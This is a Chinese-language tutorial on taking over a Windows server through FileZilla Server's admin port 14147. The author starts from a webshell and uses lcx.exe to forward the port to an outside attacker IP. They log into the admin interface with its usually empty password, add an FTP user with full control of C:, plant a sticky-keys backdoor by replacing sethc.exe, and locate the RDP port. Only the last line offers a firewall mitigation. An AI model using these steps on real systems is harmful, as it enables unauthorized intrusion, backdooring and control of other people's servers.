FileZilla Server 利用14147端口提权视频教程

这里为大家分享一下FileZilla Server 利用14147端口提权视频教程，这样对于防御就有了个不错的思路，最后对给大家一个预防思路啊。

做个教程投稿，不知道有没有奖励~~

开了有3306，说明有root，不过我试了root账户被降权了，也就没法利用了，

所以利用14147提权，

用lcx端口转发工具，把14147端口转发到我们本机，

shell上运行D:\RECYCLER\lcx.exe -slave 42.239.18.58 327 127.0.0.1 14147

这样把14147转发到我们本机的327端口上，

先本机监听，本机运行lcx -listen 327 3333

是把327转发到3333，

现在在shell运行，

[+] Accept a Client on port 327 from 103.31.75.78 .....
[+] Waiting another Client on port:3333....

OK，然后我们本机下载FileZilla Server这个软件，来连接登录上去，

端口是3333，管理密码一般都是空，

已连接, 等待认证
协议警告: 服务器版本不匹配: 服务器版本为 0.9.51.32, 管理界面版本为 0.9.65.0
协议错误: 协议版本不匹配: 服务器协议版本为 0.1.11.0, 管理界面协议版本为 0.1.13.0

出现这个提示，说明版本不匹配，怎么办呢，他这个版本如果是老版本，网上还难找，

一般软件安装目录，是有权限浏览的，然后就能下载咯，我们在他服务器上下载他的，就和他的版本一样了，

D盘没有，

对路径“C:\”的访问被拒绝。

访问不了C盘根目录，我们直接访问C:\Program Files\

看到没，FileZilla Server，进去，下载里面的文件到本机，是可以下载的，我已经下载过了，

已连接，正在等待验证
已登录

然后点用户，添加一个自己的，密码勾上设置个密码，也可以不设置就是空密码，

然后点共享文件夹，添加一个C盘，右侧的权限都勾上，然后保存，

现在用FTP软件连接，端口一般是21，点编辑，设置这里可以看到端口，

现在C盘完全控制，上shift后门咯，

替换掉下面这两个文件夹的sethc文件，
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe

我用cmd替换，俩都换好了，现在找远程端口，

查服务tasklist /svc

svchost.exe                   1628 TermService 

TermService  的PID是1628，现在找PID 1628 对应的端口，就是远程端口咯，

查端口netstat -ano

TCP    0.0.0.0:7755           0.0.0.0:0              LISTENING       1628

端口是7755

OK服务器到手。

教程到此结束。

脚本之家小编给出的防御方法：通过端口策略或防火墙，禁止本地的14147连接任意ip的任意端口即可。